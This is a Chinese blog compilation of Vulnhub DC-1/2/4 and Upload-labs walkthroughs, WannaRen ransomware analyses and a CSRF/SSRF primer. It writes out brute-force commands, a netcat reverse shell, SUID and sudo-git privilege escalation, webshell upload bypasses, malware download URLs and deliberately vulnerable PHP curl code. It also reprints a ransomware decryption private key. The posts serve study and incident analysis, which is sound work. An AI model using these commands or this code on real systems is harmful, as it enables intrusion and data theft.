Vulnhub靶场之DC-4 AIS 开头先解释一下为啥没有DC-3DC3的虚拟机安装完后，设备无法联网，内网无法被发现，因此跳过。老规矩，先查一下目标地址192.168.75.137使用nmap对目标进行扫描nmap -sS -p 1-65535 -A 192.168.75.137开启了80.22端口，直接访问80端口，看看是何方神圣还是老规矩，上Hydra大杀器hydra爆破密码： hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.75.137 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F如果你出现这种情况请进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压：gzip -d rockyou.txt.gz登录成功用burp抓包查看nc反弹shell： nc -e /bin/sh 192.168.75.129 4444发现三个账户jim的账户中有密码文件爆破猜解ssh密码，与账户 hydra -L dc4.txt -P passwd.txt -t 6 ssh://192.168.75.131登录进去。看起来好像是有一个邮件的意思噗，密码都出来了登录上去尝试sudo -l 提权，出现提示，使用teehee更改权限，并提权为root

Vulnhub靶场之DC-2 WordPress 环境：kali：192.168.75.129              DC2 -靶机 和 kali 在同一C段先是arp-scan -l检索局域网内主机发现靶机地址，使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136发现打开了80端口，SSH端口那么直接访问80看看有没有什么神奇的东西还跳转了，上hosts重定向。win10路径： C:\Windows\System32\drivers\etclinux路径：/etc/hosts 访问成功，发现flag1使用工具 cewl爬取生成密码cewl http://dc-2/ -w passwd.txt准备使用wpscan进行搞事情，但我。。上hydra大杀器吧，修是不可能修的，，，WordPress默认后台地址：/wp-admin 且WordPress当用户名不存在时会提示用户不存在，可增加爆破效率hydra -L user.txt -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'我们跑出了 jerry和tom账户，登进去看看tom，没啥东西，jerry用户界面如下，发现了flag2啊哈想到上一个DC1的靶机是用SSH干进去的问题是，WordPress的CMS本身还是比较安全的，问题基本都出在插件上，可这个jerry的账号权限不够，无法安装插件来上传shell那就硬着头皮ssh试试看，用登录账号密码试试jerry老贼不是同一个密码，太草（一种植物）蛋了试试看Tom老贼不愧是你。。。。执行命令发现 command not found，百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加BASH_CMDS[a]=/bin/sh;a $ /bin/bash export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin得到flag3切换到Jerry，发现flag4.txt哈？Git还能提权？试试看吧。看看git有没有那个权限 sudo -lflag不会骗人（小声bb）sudo git -p help !/bin/sh奇怪，我怎么没法提权，查了查百度，发现git有一个缓冲区溢出漏洞，在使用sudo git -p --help时，不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数，使其一次性显示不完这条命令的回显结果，这样这条命令就一直处于运行状态，加上此时处于root权限，我们直接在这时候打开bash shell，直接提权至root。看起来要打开gui了，来自Xshell的鄙，艹（一种植物）奇怪的知识增加了

Vulnhub靶场之DC-1 Drupal 今天来进行CTF的小测试题，DC靶场1，难度不高，最适合我这种萌小新了。安装上ova虚拟包，看看访问正常不正常正常，上nmap扫描一下端口回到网站，查看robots.txt，看看有没有什么有用的信息比我还白，，，似乎是有一个古老的漏洞CVE，拿MSF打一下看看，搜索drupal开干，获取相应。然后Getshell这是撒？，这奇妙的名字，读取一波看看通过百度可知drupal的数据库配置文件在/sites/default/settings.php真是有趣，爆破、、、远程连接暂时不得动。不如来查看etc/passwdemmmmm这是啥啊？根据flag2提示暴力破解flag4账户密码，利用自带的medusa+John the Rippermedusa -M ssh -h 192.168.75.135 -u flag4 -P /usr/share/john/password.lst -e ns -F -M: 表示你要破解的类型。-h：目标机器地址。-u：用户名。-e : 尝试空密码。-F：破解成功后立即停止破解。-v：显示破解过程。very nice 但是确定是让我爆破？ssh连接目标emmmm。不是root玩毛线要想有root权限：1 以root账户登录(尝试使用爆破未果）2 普通用户登录，查找具有suid权限位的命令去get shellsuid权限位：说明可以以root权限执行命令可我这种垃圾怎么会提权，呜呜呜find / -type f -perm -u=s 2>/dev/nullfind / -type f -name shell -exec "whoami" \;我也不知道为什么要用find 哈哈哈这这这。。。root权限？find / -type f -name shell -exec "/bin/sh" \;跑一波sh试试搞定。。。

Upload-labs靶场11-19关记录 下午继续来打这个upload靶场第十一关：观察源码，发现存在字符拼接。黑名单被取而代之变成白名单。当有php环境中有两个截断条件：1.php版本小于5.3.4 详情关注CVE-2006-72432.php的magic_quotes_gpc为OFF状态，便会有00截断，利用00截断上传。因为我用的是php73，改成52进行试验改为上传成功第十二关：这里保存用了post方法，所以要用burp再16进制里面改，因为post不会像get对%00进行自动解码。上传成功第十三关：上传图片马即可。copy normal.jpg /b + shell.php /a webshell.jpg上传成功第十四关：和第十三关很类似，只不过变成imagesize校验。依然可以通过图片马绕过上传上传成功第十五关：这里用到php_exif模块来判断文件类型，还是直接就可以利用图片马就可进行绕过：不过，我起初多次测试，老是报错然后我才发现，我exif模块没开，，，上传成功第十六关：本关综合判断了后缀名、content-type，以及利用imagecreatefromgif判断是否为gif图片，最后再做了一次二次渲染，绕过方法：上传成功第十七关：本关是条件竞争，查看代码：这里先将文件上传到服务器，然后通过rename修改名称，再通过unlink删除文件，因此可以通过条件竞争的方式在unlink之前，访问webshell。首先在burp中不断发送上传webshell的数据包然后不断在浏览器中访问，发现通过竞争可以访问到：第十八关：和前一关非常类似，只不过结和前面几关的方法，对文件后缀名做了白名单判断，然后会一步一步检查文件大小、文件是否存在等等，将文件上传后，对文件重新命名，同样存在条件竞争的漏洞。可以不断利用burp发送上传图片马的数据包，由于条件竞争，程序会出现来不及rename的问题，从而上传成功：第十九关:CVE-2015-2348 move_uploaded_file() 00截断，上传webshell，同时自定义保存名称，直接保存为php是不行的发现move_uploaded_file()函数中的img_path是由post参数save_name控制的，因此可以在save_name利用00截断绕过

Upload-labs靶场6-10关记录 今天继续练习upload靶场第六关：对文件末尾进行了处理，但是对于windows的特性，我们可以在后缀前添加空格来绕过解析，打开burp截断修改上传成功第七关：相比第六关，第七关抛弃了去后缀点的操作，但是对于windows系统，后缀的点将会自动删除，用burp截断添加一个点第八关：与第七关相比，缺少了对DATA流的处理，在PW环境的情况下：如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名老规矩，上万能的burp，截断修改上传成功第九关：程序先是去除文件名前后的空格，再去除文件名最后所有的.，再通过strrchar来寻找.来确认文件名的后缀，但是最后保存文件的时候没有重命名而使用的原始的文件名，导致可以利用类似one.php. .(两个点号之间有一个空格)绕过，如果重名名了文件的话应该会用$file_ext来进行拼凑文件，这样保存在服务器中的文件将没有后缀（去除了.空格）上burp截断修改成功第十关：黑名单加重写，使用双写后缀绕过成功

Upload-labs靶场1-5关记录 工具：upload-labs靶场源码一枚，Phpstudy大法一个，Burp项目地址：https://github.com/Tj1ngwe1/upload-labs首先先安装好靶场，有Web基础的话，我就不再说了，windows平台拿phpstudy就好了。。。过程先从第一关开始：先看到有一个上传点，尝试上传webshell被拦截，点击查看代码，查看关键点，发现存在前端js验证那么可以选择关闭浏览器js进行测试，这里我选择使用burp进行改包，先把webshell改成.png上传，用burp改为php后缀成功第二关：老规矩，直接查看源码：对content-type:类型进行了规定，尝试使用burp截断修改绕过上传成功第三关：上传特殊解析后缀绕过常见特殊解析后缀有asp:asa,cer,cdxaspx:ashx,asmx,ascxphp:php2、php3、php4、php5、phps、phtmljsp:jspx,jspf那么，吧后缀改成php2上传成功第四关：很明显，这次连解析也没的玩了，考虑到我的目标http服务是apache，尝试使用htaccess文件将指定文件解析为脚本编写文件<FilesMatch "5"> SetHandler application/x-httpd-php </FilesMatch>解析为php成功第五关：很明显，连h文件都被屏蔽了，怎么办呢，服务器对上传文件的解析貌似只存在小写，使用大写来绕过测试。成功上传解析

浅谈HTTP的各种请求方法 早在http1.0时代，最基础的三个请求模式被定义出来，他们分别是GET POST HEAD慢慢到了Http1.1时代，请求基本模型就出来了，这一次，增加了更多的功能类请求OPTIONS, PUT, DELETE, TRACE 和 CONNECTGET那么，先从最最最基础的GET请求开始说起，做为http三巨头之一，顾名思义，他面向于获取类型的请求，比如，向特定的资源发出请求。注意：GET方法不应当被用于产生“副作用”的操作中，例如在Web Application中，其中一个原因是GET可能会被网络蜘蛛等随意访问。Loadrunner中对应get请求函数：web_link和web_url，其最明显的特征就是，打开地址栏，你可以非常清楚的看到，他发送了什么。POSTpost作为和get一样古老的东西，作为“邮件”同样顾名思义，它是想服务器发送数据，然后再从服务器那边获取返回数据。向指定资源提交数据进行处理请求（例如提交表单或者上传文件）。数据被包含在请求体中。POST请求可能会导致新的资源的建立和/或已有资源的修改。 Loadrunner中对应POST请求函数：web_submit_data,web_submit_form，最明显的特征就是，你无法直观的看出，你的客户端对服务器发送了什么，数据内容是存在于body内的，只能通过抓包解析出。HEAD我通常吧head请求看作是get请求的阉割版，他只响应http头部，响应主体不会被发出，这一方法可以再不必传输整个响应内容的情况下，就可以获取包含在响应小消息头中的元信息。是的，心跳检测用head请求再好不过了。OPTIONS返回服务器针对特定资源所支持的HTTP请求方法，也可以利用向web服务器发送‘*’的请求来测试服务器的功能PUT向指定资源位置上传其最新内容DELETE请求服务器删除Request-URL所标识的资源TRACE回显服务器收到的请求，主要用于测试或诊断CONNECTHTTP/1.1协议中预留给能够将连接改为管道方式的代理服务器。那么，值得注意的，在请求报文里面，请求类型必须是大写的，否则服务器可能将返回405 method not allowdHTTP工作原理HTTP协议定义Web客户端如何从Web服务器请求Web页面，以及服务器如何把Web页面传送给客户端。HTTP协议采用了请求/响应模型。客户端向服务器发送一个请求报文，请求报文包含请求的方法、URL、协议版本、请求头部和请求数据。服务器以一个状态行作为响应，响应的内容包括协议的版本、成功或者错误代码、服务器信息、响应头部和响应数据。HTTP 请求/响应的步骤：客户端连接到Web服务器->发送Http请求->服务器接受请求并返回HTTP响应->释放连接TCP连接->客户端浏览器解析HTML内容1、客户端连接到Web服务器一个HTTP客户端，通常是浏览器，与Web服务器的HTTP端口（默认为80）建立一个TCP套接字连接。例如，http://www.baidu.com2、发送HTTP请求通过TCP套接字，客户端向Web服务器发送一个文本的请求报文，一个请求报文由请求行、请求头部、空行和请求数据4部分组成。3、服务器接受请求并返回HTTP响应Web服务器解析请求，定位请求资源。服务器将资源复本写到TCP套接字，由客户端读取。一个响应由状态行、响应头部、空行和响应数据4部分组成。4、释放连接TCP连接若connection 模式为close，则服务器主动关闭TCP连接，客户端被动关闭连接，释放TCP连接;若connection 模式为keepalive，则该连接会保持一段时间，在该时间内可以继续接收请求;5、客户端浏览器解析HTML内容客户端浏览器首先解析状态行，查看表明请求是否成功的状态代码。然后解析每一个响应头，响应头告知以下为若干字节的HTML文档和文档的字符集。客户端浏览器读取响应数据HTML，根据HTML的语法对其进行格式化，并在浏览器窗口中显示。其实就是曾经发表的一篇文章中RTT的说明

WannaRen勒索病毒作者主动向火绒提供解密密钥（转载） 4月9日，“WannaRen”勒索病毒作者通过多方主动联系到火绒，并提供了相关解密密钥。经火绒工程师分析后，验证密钥有效，稍后也会发布针对该病毒的解密工具，欢迎关注火绒各官方平台随时获悉通知。被该病毒攻击加密文件的用户也可以随时联系我们获取帮助。此外，我们也将在文末公布该密钥，分享给广大安全同行和专业团队，共同开发解密工具，帮助遭遇该病毒的用户解决问题，挽回损失。9日上午，一名火绒用户以解密为由，通过邮件尝试联系“WannaRen”勒索病毒作者获取更多信息。该作者在要求火绒用户支付比特币作为赎金未果后，竟主动提供病毒解密钥匙，并要求该火绒用户将密钥转发给火绒团队，制作“相应解密程序”。从上述邮件可以看出，该病毒作者在使用英语进行交流后，又使用了中文进行沟通，再加上火绒此前披露该病毒使用易语言编写的情况来看，极有可能为国人所为。至此，随着事件发酵，各媒体、安全厂商进行了大量的曝光和溯源调查，截止目前，该病毒作者提供的比特币钱包未收到任何赎金，而该作者也已经停止下发、传播“WannaRen”勒索病毒。-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAxTC/Igjuybr1QbQ1RmD9YxpzVnJKIkgvYpBrBzhsczHQ8WeC 7ikmC5jTbum1eCxTFTxvtnONEy2qDbnSS5fbK/lxYExj6aDLKzQxXCOVSdSQCesW g1i5AAdUC9S246sdS9VKxT0QL24I+SG+ixckBhcB+ww6z47ACegoH0aLDwvRvehZ Ycc1qFr1lhRXQpHunrlg4WRphH5xBbszOI+dFRDOpprnbN56CHoLb0q1SzzV3ZFA FF6Df68Pux1wMHwEXbULRHo5AIZJPJq8L9ThWVsj6v42jAjJQ8m8bRh0+Jz4Rohk WwPgL+VFxDG2AiiCU5/yLNoQX0JM9VWBxy6Z3QIDAQABAoIBADi/KoH06CMNtn7O CXbTepgGiKKcCVGMTHak8OgHCM6ty19tVnSLSvOTa2VDxIFs4AwAdHWhEzwtq/5/ N1GhxeUFx+balPYq28z3HC1T4CZ7EWiJStVJtxOXCEzPTkJ+f9PO8dGJHRtJIzPu zhLg+fD2tg81GceZYRJ4yPMXLfWKA5DmGkRv/1Usq5zvMClLdrmw/q2rnCbRLdeE EAzSAi9kqsnEaZKfCbXb/gby+bUwAgn7mxs+CJ611hzD/r2w9dgXkaUJYuKRRv+B GlQHBRQ7hXogkIzeaGqmw8M3xko7xzADsytFYxt2Kthuww2YV4E6Q1Hl4bBW0q+g w+jSolECgYEA0Tnns+LaqMd5KCQiyWlCodQ2DtOMOefhIrJbRhdAkAq6FtVICxkL nIJL0gmo4T/zDaMr8vsn7Ck+wLjXUsYt1/EulLtVnuH76FU0PkjJqBdre5Gjf23/ YGHW7DJEoH3p/7DIgV4+wXPu6dD+8eECqwm1hLACOxkfZnOFZ1VGxeMCgYEA8UYH jaA69ILlz0TzDzoRdTmam6RDqjsVO/bwaSChGphV0dicKue25iUUDj87a1yLU5Nq t0Kt0w1FL/iile1Eu4fe4ryukPGw2jAZh/xq7i2RRSFLXim5an9AbBVQ55478AJa sTaIOSoODgBspsBLShnXQRKEfwYPv2GthhcJLT8CgYAssRDERQ3uBYXkxCtGGJzq Enllm1yVtelKTwzeIPNikVgErpRQAo6PZOmrOPMBAnb5j8RAh9OUR48m/ZTJEpoS SWtoy8dTQ/RaQXECaOviYvZLk+V3v9hQDzYoh+hO2/aS7oE12RrQmeILwd/jbOvz +wPyDuK7GvexG7YAR5/xfwKBgQCA8p6C0MnxeCv+dKk60BwYfKrm2AnZ5y3YGIgw h2HS5uum9Y+xVpnnspVfb+f/3zwPdNAqFZb1HziFBOtQGbkMSPeUUqcxjBqq4d4j UYKMvQnQ2pR/ROl1w4DYwyO0RlteUMPLxotTkehlD1ECZe9XMSxb+NubT9AGxtuI uLMM3QKBgGl0mYCgCVHi4kJeBIgabGqbS2PuRr1uogAI7O2b/HQh5NAIaNEqJfUa aTKS5WzQ6lJwhRLpA6Un38RDWHUGVnEmm8/vF50f74igTMgSddjPwpWEf3NPdu0Z UIfJd1hd77BYLviBVYft1diwIK3ypPLzhRhsBSp7RL2L6w0/Y9rf -----END RSA PRIVATE KEY----- 转载地址：http://bbs.huorong.cn/thread-68350-1-1.html不知道为什么，突然很想笑

对WannaRen勒索病毒溯源新进展 恶意软件伪装为激活工具（kms）分发万恶的下载站，，勒索提示信息为“WannaRen”，排查发现主机不存在MS17-010漏洞。了解到之前下载过KMS类的系统激活工具。分析发现KMS工具存在访问URL加载其他恶意程序的行为。点名某西下载站。安全你XX呢？鬼话连篇发现在“kms激活工具 19.5.2.exe”程序中，捆绑了powershell恶意代码。如下病毒信息恶意代码执行时，首先延时2000秒（33分钟），一定程度上造成没有恶意行为的假象，影响安全研究人员分析；如果系统中安装了360、QQ防护则不执行后续代码。然后呢。勒索病毒代码以“白加黑”的形式被调用，匿影病毒传播脚本会将“白加黑”恶意模块（wwlib.dll和WinWord.exe）下载到c:\ProgramData目录执行。病毒运行后，会将C:\ProgramData\WinWord.exe注册为系统服务，电脑重启后即会执行恶意代码，加密用户文件。主要通过“匿影”病毒传播脚本进行下发。目标地址1：http://cs.sslsngyl90.com 目标地址2：http://cpu.sslsngyl90.com/vip.txt病毒脚本执行后，会下载执行多个恶意模块，其中包括：勒索病毒、挖矿病毒、永恒之蓝漏洞攻击工具。其中，永恒之蓝漏洞攻击模块会在网络内通过漏洞攻击的方式传播恶意代码。在攻击成功后，会在被攻击终端中运行远程恶意脚本（my****.at.ua/vip.txt），此脚本于报告上述vip.txt恶意脚本模块逻辑基本相同，同为下载执行上述诸多恶意模块，也不排除该恶意脚本下载执行WannaRen勒索病毒的可能性。截止昨晚获取到该脚本时候，内部恶意代码已被删除。获取到的powershell脚本主要功能为：下载程序到本地执行。其中的WINWORD.EXE带数字签名，可以绕过杀软检测，wwlib.dll使用vmp加壳，其编译信息和加壳信息与WannaRen勒索信息程序一致。@WannaRen@.exe程序PE信息wwlib.dll程序PE信息在分析环境，wwlib.dll不能被运行，所以无法确认是否存在加密行为。截止目前8号下午5点，已发出的安全分析文章，认为该程序（wwlib.dll）即WannaRen的加密模块。勒索病毒行为该勒索病毒采用对称和非对称（RSA+RC4）加密，除非得到勒索病毒作者的私钥，否则无法进行解密。勒索病毒首先生成随机的RC4密钥，如“p2O6111983YU1L “，并使用这个单一密钥加密所有文件，被加密的文件会被添加.WannaRen后缀。生成密钥后，病毒会导入RSA公钥对随机生成的RC4密钥进行加密，并存储在每个加密文件的头部。具体代码，如下图所示：生成随机的RC4密钥导入公钥加密RC4密钥病毒作者的公钥使用RC4算法加密原始文件为了使勒索后的电脑可以继续使用，勒索病毒在加密时会跳过特殊路径，跳过的路径关键字勒索病毒会加密特定扩展名的文件加密的文件扩展名加密后的文件由两个部分组成， 前面为加密后的RC4密钥，后面为加密后的文件内容被加密后的示例文件内容勒索病毒在加密每个文件夹时会释放勒索说明文档，且完成后会在公用桌面上创建“想解密请看此文本.gif”、“想解密请看此文本.txt“以及一个解密程序” @WannaRen@.exe “后门、勒索、挖矿一体的下载器上述分析的其实只是恶意代码的“冰山一角”，hxxp://cs.sslsngyl90.com中后续的代码还会执行更多的行为，包括：下载并执行挖矿程序（门罗币）下载“永恒之蓝”工具包并集成批量扫描工具Everything工具外壳程序，实际为木马程序，开放并监听本地3611端口甚至包含一些驱动程序，创建设备\\Device\\WinRing0_1_2_0等。门罗币挖矿进程：成功下载到本地的文件同时，该病毒存在一些“缺陷”，即部分URL已经“失效”或者返回404，导致脚本异常退出中断执行。各模块hash：WINWORD.EXE       CEAA5817A65E914AA178B28F12359A46wwlib.dll                  9854723BF668C0303A966F2C282F72EAyou                          2D84337218E87A7E99245BD8B53D6EABnb.exe                     CA8AB64CDA1205F0993A84BC76AD894Aofficekms.exe          39E5B7E7A52C4F6F86F086298950C6B8WinRing0x64.sys     0C0195C48B6B8582FA6F6373032118DA防护建议不要下载或打开来路不明的文件，并且及时备份重要数据，妥善保管。安装并使用具备主动防御功能的终端防护软件，并及时更新病毒库版本。下载软件请前往官网下载，尽量避免使用下载站下载。文章改编自：绿盟公众号：https://mp.weixin.qq.com/s?__biz=MzU3NTcxNjkwMg==&mid=2247484397&idx=1&sn=576a65b3554fdabf37c904d92d921878&chksm=fd1fa8a4ca6821b21b09f7f48d9be0294d5243891f0cfa1af7328142e6d3309c67e0770b4c1a&mpshare=1&scene=23&srcid=&sharer_sharetime=1586358489740&sharer_shareid=4e6650b4a46c26f146a18e879fa887b8#rd吾爱破解论坛（火绒安全）：https://www.52pojie.cn/thread-1151815-1-1.html实际测试如何，从群友那边获取来的中毒虚拟机压缩包已经在路上了

对某网传WannaRen的跟进 15小时后，正准备狠狠心做win10实体机测试的时候，最早让吾做分析的同学通知我。火绒实验室也发表了同样的结论于是抱着能懒就懒的精神，我索性不测试了。（1w的电脑可不敢折腾哦。。）直接上图：暂时火绒实验室的说法与吾的分析大同小异，这只是一个释放的解密程序（猜中了千千万，就是没确定是个解密。。），而源病毒暂时未找到文件（就说源病毒为啥会用易语言写。。。。）引用火绒官方的话：目前，感染该勒索病毒的文件还无法被破解。建议用户不要轻易使用安全软件对该解密工具进行查杀，以免无法赎回被加密的重要资料。同时，360安全也发表了结论，不过毕竟是大团队，拿到的是原版，也是得出我们所分析的文件乃是释放的解密工具的情况。最后稍安勿躁，等待专家的结果，另外可参考本站对0796漏洞分析，及时升级系统打上补丁，防止被传播文章地址：https://www.jcdpn.cn/?p=96

对某网传WannaRen的分析 判断可能具有反虚拟机能力，据传有穿透虚拟化能力，打开软件无效果，初步判断套了软件壳打开过检测的虚拟机，据说会加密win10，因此拿win7进行检测，这是网友分享的据说是原版的样本下载进行测试，发现360大爷直接报毒关闭360和360相关的安全模块，为了宿主机安全起见，断开虚拟机网卡，且拍摄快照，打开宿主机两个安全软件直接赋予管理员权限运行可能是因为win7的缘故，我没能见识到他的发作，只有一个怪异的页面。说明缴纳0.05的BTC。但是，，这方方块块的边框是怎么回事？？？巨眼熟有没有。？？？真的是似曾相识，有点眼熟啊。莫非我拿的真的是假的？？反编译试试看直接丢到OD里面，在搜索ASCII和Unicode，还卡住了，还有这乱糟糟的内容，一定具有加密壳等了5分钟终于载入出来了，然后翻着翻着看到这个区块。我4不4发现了什么不对劲的东西，这个完美的程序为什么有如此怪异的名字？好像是有点像？and。。。。这个奇妙的字段又代表着什么。。。继续翻看数据内容，发现调用了打印机的借口？人类迷惑行为。这么壕无人性的程序您居然是用易语言写的？？？放在微步云沙箱测试看看还发现发起了TCP连接，目标疑似是一个谷歌云的北京节点（为啥在国内诶？）从另外一份分析中看出，这个地址不是唯一的，经过直接访问，发现是谷歌云CDN节点对于为什么有一个访问谷歌的CDN地址，我做出如下两个判断1.程序可能调用其作者部署在网站上API接口来验证是否为正确密匙。 2.可能还存在一个核心的解密程序，分发在谷歌云的CDN上来实现全球操作第一种问题倒是不大，吾本人倒是比较惧怕出现第二种情况，若这个程序纯粹只是一个用作验证秘钥的程序，那么用于真正解密的核心程序是否会在用户电脑上埋雷？这就无从考究了看起来VMP壳的猜测是对的，但是依然不确定是否为易语言程序以及是否为源病毒。为此，我联系上了群内的一位逆向大佬，等待明天回音。对于加密文件和传播，目前没发现这个EXE具有加密行为，也未进行除谷歌云的443端口外的其他端口的请求，严重怀疑拿到的是释放文件。上图是据说原版的多个版本，在win7下均未出现问题，如前文所述如出一辙。写到这里的时候，大佬也回了我的疑问。大佬非常确信的验证了我的假想总结：目前所测试的程序由易语言编写而成，不具有传播能力，外包VMP软件壳加密内容，反调试。且调用未知的谷歌CDN节点地址，疑似空壳或单一功能的释放文件。后续如何请看明日后续

CSRF与SSRF CSRF又称跨站请求伪造，XSS就是CSRF中的一种。二者区别，XSS利用的是用户对指定网站的信任，CSRF利用是网站对用户浏览器的信任。发生条件当用户在安全网站A登录后保持登录的状态，并在此时浏览了保存有恶意代码的另一个网站B。此时B站劫持用户的浏览器并以用户以登录的状态对A站发送非用户本人的操作。当服务端没有对这次请求验证的情况下，将这次操作作为可信任的用户的操作。发生地点攻击者可以将恶意网址或者代码藏在论坛博客等任何用户生成内容的网站中。这意味着如果服务端没有适合的防御措施的话，用户即使访问熟悉的可信网站也有受攻击的危险。类似于XSS一些html标签可以发送HTTP GET类型请求 像,浏览器渲染img标签的时候，并不知道标签中src属性的值，是否为一个图片，浏览器发起一个HTTP GET请求，并携带当前受害者当前浏览器在网站的cookie，获取返回结果。对于很多网站来说，即使是一些重要的操作使用POST来提交请求，但是服务器再接收请求的时候并没有严格区分POST和GET。在PHP中滥用$_REQUEST就是例子。如果服务端已经区分了GET,POST只用POST请求数据，可以通过制造一个隐藏的表单，并通过js代码自动提交伪造的表单。要我说的话，和XSS有一部分类似防御增加验证码机制，增加带有大量噪点的验证码，杜绝代码能够识别的简单验证码，当然了也经常被绕过验证referer,采用同源政策，referer记录着数据包的来源地址，来判断请求的合法性，但是这个可以伪造使用Token，令牌是一种将表单value的加密算法生成不同的加密结果，在服务器端进行验证。在访问登录过一个网站，点击退出账户。SSRF又名服务端请求伪造攻击有的大型网站在web应用上提供了从其他服务器获取数据的功能。使用户指定的URL web应用获取图片，下载文件，读取文件内容。攻击者利用有缺陷的web应用作为代理攻击远程和内网的服务器（跳板）危害：可对外网，服务器所在内网，受控服务器进行端口扫描，获取一些banner对内网web应用进行指纹识别，通过访问默认文件实现攻击内外网web应用，主要是使用get参数就可以实现分攻击利用file协议读取本地文件该漏洞存在的条件是对curl函数的滥用比如：if(isset($_POST['commit'])){ $link = $_POST['url']; $filename = './curled/'.rand().'txt'; $curlobj = curl_init($link); //初始化连接 $fp = fopen($filename,"w"); curl_setopt($curlobj, CURLOPT_FILE, $fp); //设置输出文件，默认为STDOUT (浏览器)。 curl_setopt($curlobj, CURLOPT_HEADER, 0); //设置为0表示不返回HTTP头部信息。 curl_exec($curlobj); //执行curl请求 curl_close($curlobj); //关闭curl连接 fclose($fp); $fp = fopen($filename,"r"); $result = fread($fp, filesize($filename)); fclose($fp); //关闭文件 echo $result; }并为对输入的命令进行过滤，导致服务器遭到攻击修复方案：过滤返回信息，如果web应用数去获取某一类型文件，在把结果返回给用户之前先验证信息是否符合标准。例如：当攻击者利用"识别图片"下的该漏洞远程包含一个文件，可以通过在服务器上验证返回数据是否是纯像素，来进行过滤。统一错误页限制请求端口为http常用端口 80,443,8080,8090内网IP黑名单，避免应用被用来获取内网数据，攻击内网